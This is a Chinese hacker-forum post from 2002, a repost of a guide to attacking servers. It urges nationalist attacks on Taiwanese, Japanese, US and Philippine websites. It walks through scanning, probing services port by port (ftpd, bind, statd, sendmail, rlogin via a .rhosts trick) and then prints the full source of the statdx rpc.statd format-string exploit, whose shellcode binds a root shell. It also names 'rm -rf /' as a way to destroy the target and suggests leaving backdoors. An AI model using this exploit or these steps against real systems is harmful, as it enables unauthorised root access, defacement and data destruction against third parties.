永远的FLASH 
级别:刀光雪影版主
威望:3
经验:1
货币:5852
体力:
来源:江苏
总发帖数:2264
注册日期:2002-02-11 |
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
从来没有写过什么东西,这次就献丑了…
攻击一般来说分为以下几个步骤:
1.
确立目标
2. 扫描.
3. 探测漏洞并且进行分析
4. 找对应的exploit程序.
5.
编译程序,并且运行. 测试是否获得root权限
6. 视情况修改站点主页或者通知webmaster,或者来个rm –rf
/进行彻底破坏.
7. 打扫战场,决定是否留后门
8. game ove ,可以去吃饭或者睡觉了(别打我)
下面详细说明:
一. 确立目标.
近段时期老是发生另国人愤慨的一些事情.台湾的台独分子、日本的修改教科书以及这几天的美国无理撞毁我战斗机的事件等等都令广大热血青年愤慨不已.作为红客联盟的一员,我们有必要对这些反华势力站点置以毁灭性的一击.
所以目标缩定:台湾的台独网站,日本的反华势力网站,美国的某些站点(这个就步用我多说了吧).当然还可以加上菲律宾的嚣张势力网站.
二. 扫描.
以前lion以及很多热心的红客联盟网友公布了台湾,日本,以及美国的IP分配表.
1.
如果你想直接扫描,如果是win系统,推荐使用以前联盟公布的superscan程序,扫描速度快..并且能自定义扫描端口以及timed
out值.还可以返回对方端口的响应.如果是unix/linux系统,推荐使用nmap程序.
2.
如果想在肉鸡上扫描,请使用nmap程序.
这里不详细说明如何使用nmap以及superscan的方法.
以扫描210.59.*.*为例.(为防泄露,隐去改IP.)调用superscan,填入IP,选好要扫描的端口范围,然后开始.扫描结果如下:
* + 210.59.*.*
|___ 21 File Transfer Protocol [Control]
|___ 22 SSH Remote Login Protocol
|___
SSH-1.99-OpenSSH_2.1.1.
|___ 23 Telnet
|___ ..... ..#..'
|___ 25 Simple Mail Transfer
|___ 220 ep1.eparty.com.tw
ESMTP Sendmail 8.11.0/8.11.0; Thu, 11 Jan 2001 13:32:10 +0800..
|___ 53 Domain Name Server
|___ 79 Finger
|___ 80 World
Wide Web HTTP
|___ HTTP/1.1 200 OK..Date: Thu, 11 Jan 2001
05:32:08 GMT..Server: Apache/1.3.12 (Unix) (Red Hat/Linux)
mod_ssl/2.6.6 OpenSSL/0.9.5
|___ 111 SUN Remote Procedure Call
|___ 443 https
|___ 513 Remote login
|___ 514 cmd
|___ 1024 Motorola Cable Modem Telnet
|___ 3306 mysql
|___ G....j.Host '210.43.195.200' is not allowed to connect to
this MySQL server
三. 探测漏洞并且分析.
通过扫描的结果可以得知对方主机开了以上几个端口.
Ⅰ.关于21端口,可能存在的漏洞是ftpd的漏洞,如果允许匿名用户(anonymous)登陆,而且存在可写的目录.
在linux主机上最常用的ftpd是wu_ftpd.并且通常是2.6.0版本.在www.hack.co.za上面早就公布了该漏洞的exploit程序.如果对方ftpd恰好是2.6.0或者以下,允许匿名登陆,并且存在可写目录,那么这台机器就是你的了J.而由此推断,如果你拥有改主机的任何一个可以ftp的用户名和密码,那么这台主机同样可以被攻击.
Ⅱ.关于22端口.这是ssh端口.理论上任何小于2.2.0版本的sshd都可以被攻击..不过我现在还没有测试过.J
Ⅲ.关于23端口.我们可以从这里取得一些基本信息…有很多站点缺省的/etc/issue.net没有修改,当我们telnet上去后就可以得到对方的主机名以及系统版本.当然,对于没有打补丁的IRIX
unix,我们可以直接利用telnetd的漏洞进行攻击,得到root权限.
Ⅳ.25端口.sendmail端口.8.9的版本都只能进行dos攻击.而freebsd的8.8.3版本可以远程溢出获得shell.一般我们直接telnet
上25端口,然后使用VRFY命令来校验该主机用户.比如:VRFY bkbll.
Ⅴ.53端口.就是DNS端口了..这里当前存在最大的隐患就是bind攻击.对于bind8.2的DNS服务器我们可以利用lion
worm来远程获得root shell.探测对方bind版本命令: dig @IP txt chaos version.bind.
Ⅵ.79端口.finger端口.老问题.可以探测当前登陆的用户名.方法:finger @IP.
Ⅶ.80端口.在linux和unix系统下面好象作用不大,在NT下就主要靠它了J.不过许多CGI程序设置不当,没有处理那些边界条件,造成溢出可以浏览硬盘上的文件.ps.可以telnet
IP 80,GET得到对方服务器的类型.
Ⅷ.
111端口.当前最流行的攻击.可以远程得到root的shell.可以利用rpcinfo –p
IP得到对方开放的r系列服务.linux存在stad漏洞,sun存在cmsd漏洞.
Ⅸ.443端口.没有利用过.
Ⅹ.513端口.rlogin的端口.如果你向服务器发送一条echo
“++”>/.rhost命令并且成功执行的话,那么当你rlogin IP的时候就不用输入密码.
Ⅺ.514端口.远程执行命令.好象没有什么漏洞.
Ⅻ.1024没有用过.
ⅩⅢ.3306端口.mysql.www.hack.co.za上面公布了几个exploit,不过我没有试过.
四.
找exploit程序.
上面介绍了这么多的漏洞,似乎root权限唾手可得…其实不然.有时候明明存在的漏洞,当你编译好程序攻击的时候,需要猜测n多次的offset值.这里给出一个常用的程序for
linux statd的。
/**
*** $ gcc -o statdx statdx.c ; ./statdx -h
*** buffer -> This is the address you'll need (-a and -l
options)
*** str -> Process-supplied string; 24 bytes long
*** 4 -> Duplicate dwords to satisfy the %!d specifiers and
*** the double %n when two successive values are equal
*** r
-> Stack position of saved eip
*** %8x.. -> Wipes the
va_list dword and str; 9 by default (-w option)
*** %!x ->
Used for padding to form an aggregate overwrite value;
*** the
exclamation mark denotes a field width. This may
*** or may not
be present, depending on the value. An
*** algorithm is used to
allow tricky values.
*** %n -> Writes overwrite value to the
corresponding address
*** sc -> Nops + portbinding shellcode
(port 39168)
***
*** Only modify the default wipe value and
the default offset value if you
*** know what you're doing.
***
*** An easy way to get the buffer address for simulation
systems that you
*** have privileged access to:
***
***
[term 1]# ltrace -p ****pidof rpc.statd**** -o foo
*** [term 2]$
./statdx -a 0x41414141 localhost
*** [term 1]# grep vsnprintf
foo | head -1 | sed 's/.*(//' | \
*** awk -F"," '{print $1}'
***
*** (Of course, ensure that rpc.statd is started at boot
time and not from
*** an interactive shell, otherwise it will
inherit a larger environment
*** and blow the accuracy of your
findings.)
***
*** Ok, longwinded enough. Let's dance.
***
*** greets
*** ------
*** ADM, attrition,
rogues, security.is, teso
***
**/
#include
<stdio.h>
#include <stdlib.h>
#include
<string.h>
#include <errno.h>
#include
<unistd.h>
#include <netdb.h>
#include
<rpc/rpc.h>
#include <sys/types.h>
#include
<sys/time.h>
#include <sys/socket.h>
#include
<netinet/in.h>
#define SM_PROG 100024
#define SM_VERS
1
#define SM_STAT 1
#define SM_MAXSTRLEN 1024
#define
max(a,b) ((a)>(b)?(a) b))
#define NOP 0x90
char shellcode[] =
"\x31\xc0" /* xorl %eax,%eax */
/*
jmp ricochet -------------------------------------------------------
*/
"\xeb\x7c" /* jmp 0x7c */
/* kungfu:
------------------------------------------------------------ */
"\x59" /* popl %ecx */
"\x89\x41\x10" /* movl
%eax,0x10(%ecx) */
/* ------------------------------------
socket(2,1,0); ---------------- */
"\x89\x41\x08" /* movl
%eax,0x8(%ecx) */
"\xfe\xc0" /* incb %al */
"\x89\x41\x04"
/* movl %eax,0x4(%ecx) */
"\x89\xc3" /* movl %eax,%ebx */
"\xfe\xc0" /* incb %al */
"\x89\x01" /* movl %eax,(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/* ------------------------------------
bind(sd,&sockaddr,16); -------- */
"\xb3\x02" /* movb
$0x2,%bl */
"\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */
"\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */
"\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */
"\x89\x49\x04"
/* movl %ecx,0x4(%ecx) */
"\x80\x41\x04\x0c" /* addb
$0xc,0x4(%ecx) */
"\x88\x01" /* movb %al,(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/* ------------------------------------ listen(sd,blah);
-------------- */
"\xb3\x04" /* movb $0x4,%bl */
"\xb0\x66"
/* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ accept(sd,0,16); --------------
*/
"\xb3\x05" /* movb $0x5,%bl */
"\x30\xc0" /* xorb %al,%al
*/
"\x88\x41\x04" /* movb %al,0x4(%ecx) */
"\xb0\x66" /*
movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,0); -------------------
*/
"\x89\xce" /* movl %ecx,%esi */
"\x88\xc3" /* movb
%al,%bl */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x3f" /*
movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,1); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,2); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ execve("/bin/sh",argv,0); -----
*/
"\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi) */
"\xc7\x46\x04\x2f\x73\x68\x41" /* movl $0x4168732f,0x4(%esi) */
"\x30\xc0" /* xorb %al,%al */
"\x88\x46\x07" /* movb
%al,0x7(%esi) */
"\x89\x76\x0c" /* movl %esi,0xc(%esi) */
"\x8d\x56\x10" /* leal 0x10(%esi),%edx */
"\x8d\x4e\x0c" /*
leal 0xc(%esi),%ecx */
"\x89\xf3" /* movl %esi,%ebx */
"\xb0\x0b" /* movb $0xb,%al */
"\xcd\x80" /* int $0x80 */
/* ------------------------------------ exit(blah);
------------------- */
"\xb0\x01" /* movb $0x1,%al */
"\xcd\x80" /* int $0x80 */
/* ricochet: call kungfu
---------------------------------------------- */
"\xe8\x7f\xff\xff\xff"; /* call -0x81 */
enum res
{
stat_succ,
stat_fail
};
struct sm_name
{ char
*mon_name;
};
struct sm_stat_res
{ enum res res_stat;
int state;
};
struct type
{ int type;
char
*desc;
char *code;
u_long bufpos;
int buflen;
int
offset;
int wipe;
};
struct type types[] =
{ {0,
"Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
9},
{1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314,
1024, 600, 9},
{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode,
0xbffff314, 1024, 600, 9},
{0, NULL, NULL, 0, 0, 0, 0}
};
bool_t
xdr_sm_name(XDR *xdrs, struct sm_name *objp)
{ if
(!xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN))
return
(FALSE);
return (TRUE);
}
bool_t
xdr_res(XDR *xdrs,
enum res *objp)
{ if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}
bool_t
xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
{ if
(!xdr_res(xdrs, &objp->res_stat))
return (FALSE);
if
(!xdr_int(xdrs, &objp->state))
return (FALSE);
return
(TRUE);
}
void
usage(char *app)
{
int i;
fprintf(stderr, "statdx by ron1n
<shellcode@hotmail.com>\n");
fprintf(stderr, "Usage: %s
[-t] [-p port] [-a addr] [-l len]\n", app);
fprintf(stderr,
"\t[-o offset] [-w num] [-s secs] [-d type] <target>\n");
fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
fprintf(stderr, "-p\trpc.statd serves requests on <port>
[query]\n");
fprintf(stderr, "-a\tthe stack address of the
buffer is <addr>\n");
fprintf(stderr, "-l\tthe length of
the buffer is <len> [1024]\n");
fprintf(stderr, "-o\tthe
offset to return to is <offset> [600]\n");
fprintf(stderr,
"-w\tthe number of dwords to wipe is <num> [9]\n");
fprintf(stderr, "-s\tset timeout in seconds to <secs>
[5]\n");
fprintf(stderr, "-d\tuse a hardcoded <type>\n");
fprintf(stderr, "Available types:\n");
for(i = 0;
types[i].desc; i++)
fprintf(stderr, "%d\t%s\n", types[i].type,
types[i].desc);
exit(EXIT_FAILURE);
}
void
runshell(int sockd)
{ char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "cd /; ls -alF; id;\n", 19, 0);
for(;
{ FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
perror("select()");
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{ bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
perror("recv()");
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff,
sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
errno = 0;
if(send(sockd, buff, ret, 0) != ret)
{
if(errno) perror("send()");
else fprintf(stderr,
"Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
void
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(39168);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) <
0)
{
perror("socket()");
exit(EXIT_FAILURE);
}
if(!connect(sockd, (struct sockaddr *) &host, sizeof
host))
{
printf("OMG! You now have rpc.statd
technique!@#$!\n");
runshell(sockd);
}
close(sockd);
}
char *
wizardry(char *sc, u_long bufpos, int
buflen, int offset, int wipe)
{
int i, j, cnt, pad;
char
pbyte, *buff, *ptr;
u_long retpos;
u_long dstpos;
while(bufpos % 4) bufpos--;
/* buflen + ebp */
retpos = bufpos + buflen + 4;
/*
** 0x00 == '\0'
** 0x25 == '%'
** (add troublesome bytes)
** Alignment
requirements aid comparisons
*/
pbyte = retpos &
0xff;
/* Yes, it's 0x24 */
if(pbyte == 0x00 || pbyte ==
0x24)
{
fprintf(stderr, "Target address space contains a
poison char\n");
exit(EXIT_FAILURE);
}
/*
**
Unless the user gives us a psychotic value,
** the address
should now be clean.
*/
/* str */
cnt = 24;
/* 1
= process nul */
buflen -= cnt + 1;
if(!(buff =
malloc(buflen + 1)))
{
perror("malloc()");
exit(EXIT_FAILURE);
}
ptr = buff;
memset(ptr,
NOP, buflen);
for(i = 0; i < 4; i++, retpos++)
{
/* junk dword */
for(j = 0; j < 4; j++)
*ptr++ =
retpos >> j * 8 & 0xff;
/* r + i */
memcpy(ptr,
ptr - 4, 4);
ptr += 4; cnt += 8;
}
/* restore */
retpos -= 4;
for(i = 0; i < wipe; i++)
{
/*
consistent calculations */
strncpy(ptr, "%8x", 3);
ptr += 3;
cnt += 8;
}
dstpos = bufpos + offset;
/*
**
This small algorithm of mine can be used
** to obtain
"difficult" values..
*/
for(i = 0; i < 4; i++)
{
pad = dstpos >> i * 8 & 0xff;
if(pad == (cnt &
0xff))
{
sprintf(ptr, "%%n%%n");
ptr += 4; continue;
}
else
{
int tmp;
/* 0xffffffff = display count
of 8 */
while(pad < cnt || pad % cnt <= 8) pad += 0x100;
pad -= cnt, cnt += pad;
/* the source of this evil */
tmp = sprintf(ptr, "%%%dx%%n", pad);
ptr += tmp;
}
}
*ptr = NOP;
/* plug in the shellcode */
memcpy(buff + buflen - strlen(sc), sc, strlen(sc));
buff[buflen] = '\0';
printf("buffer: %#lx length: %d
(+str/+nul)\n", bufpos, strlen(buff));
printf("target: %#lx new:
%#lx (offset: %d)\n", retpos, dstpos, offset);
printf("wiping %d
dwords\n", wipe);
return buff;
}
struct in_addr
getip(char *host)
{
struct hostent *hs;
if((hs =
gethostbyname(host)) == NULL)
{
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
return *((struct in_addr *)
hs->h_addr);
}
int
main(int argc, char
**argv)
{
int ch;
char *buff;
CLIENT *clnt;
enum clnt_stat res;
struct timeval tv, tvr;
struct
sm_name smname;
struct sm_stat_res smres;
struct sockaddr_in
addr;
int type = -1;
int usetcp = 0;
int timeout =
5;
int wipe = 9;
int offset = 600;
int buflen = 1024;
char *target;
char *sc = shellcode;
u_short port = 0;
u_long bufpos = 0;
int sockp = RPC_ANYSOCK;
extern char *optarg;
extern int optind;
extern int
opterr;
opterr = 0;
while((ch = getopt(argc, argv,
"tp:a:l :w  :")) != -1)
{
switch(ch)
{
case 't': usetcp = 1; break;
case 'p':
sscanf(optarg, "%hu", &port); break;
case 'a':
sscanf(optarg, "%lx", &bufpos); break;
case 'l': buflen =
atoi(optarg); break;
case 'o': offset = atoi(optarg); break;
case 's': timeout = atoi(optarg); break;
case 'w': wipe =
atoi(optarg); break;
case 'd': type = atoi(optarg); break;
default : usage(argv[0]);
}
}
if(!(target =
argv[optind]))
{
fprintf(stderr, "No target host
specified\n");
exit(EXIT_FAILURE);
}
if(type >=
0)
{
if(type >= sizeof types / sizeof types[0] - 1)
{
fprintf(stderr, "Invalid type\n");
exit(EXIT_FAILURE);
}
sc = types[type].code;
bufpos = types[type].bufpos;
buflen = types[type].buflen;
offset = types[type].offset;
wipe = types[type].wipe;
}
if(!bufpos)
{
fprintf(stderr, "No buffer address specified\n");
exit(EXIT_FAILURE);
}
bzero(&addr, sizeof addr);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = getip(target);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if(!usetcp)
{
clnt =
clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
if(clnt == NULL)
{
clnt_pcreateerror("clntudp_create()");
exit(EXIT_FAILURE);
}
tvr.tv_sec = 2;
tvr.tv_usec = 0;
clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
}
else
{
clnt = clnttcp_create(&addr, SM_PROG,
SM_VERS, &sockp, 0, 0);
if(clnt == NULL)
{
clnt_pcreateerror("clnttcp_create()");
exit(EXIT_FAILURE);
}
}
/* AUTH_UNIX / AUTH_SYS authentication forgery
*/
clnt->cl_auth = authunix_create("localhost", 0, 0, 0,
NULL);
buff = wizardry(sc, bufpos, buflen, offset, wipe);
smname.mon_name = buff;
res = clnt_call(clnt, SM_STAT,
(xdrproc_t) xdr_sm_name,
(caddr_t) &smname, (xdrproc_t)
xdr_sm_stat_res,
(caddr_t) &smres, tv);
if(res !=
RPC_SUCCESS)
{
clnt_perror(clnt, "clnt_call()");
printf("A timeout was expected. Attempting connection to
shell..\n");
sleep(5); connection(addr);
printf("Failed\n");
}
else
{
printf("Failed - statd returned res_stat:
(%s) state: %d\n",
smres.res_stat ? "failure" : "success",
smres.state);
}
free(buff);
clnt_destroy(clnt);
return -1;
}
/* www.hack.co.za [7 August 2000]*/
5.编译程序
编译方法:gcc –o statdx statdx.c(假设文件名为statdx.c)
运行:statdx –h 获得帮助
$statdx –d num IP(num=0,1,2)
具体offset的获得可以参考程序里面提到的.
如果攻击成功的话,应该是:
id
uid=0,gid=0…..
表示你已经是root了..你就可以为所欲为了.
J
PS:如果对方主机没有什么罪大恶极的事情..你就不要动它吧.我们是红客又不是crackerJ
小弟第一次写作…还望各位大哥多指导指导..
|
首页 
小榕软件实验室 
刀光雪影 
攻击的一般步骤 [转帖] 
将此页发给您的朋友
编辑
删除
发表于
2002-11-03.18:17:38 
IP: 
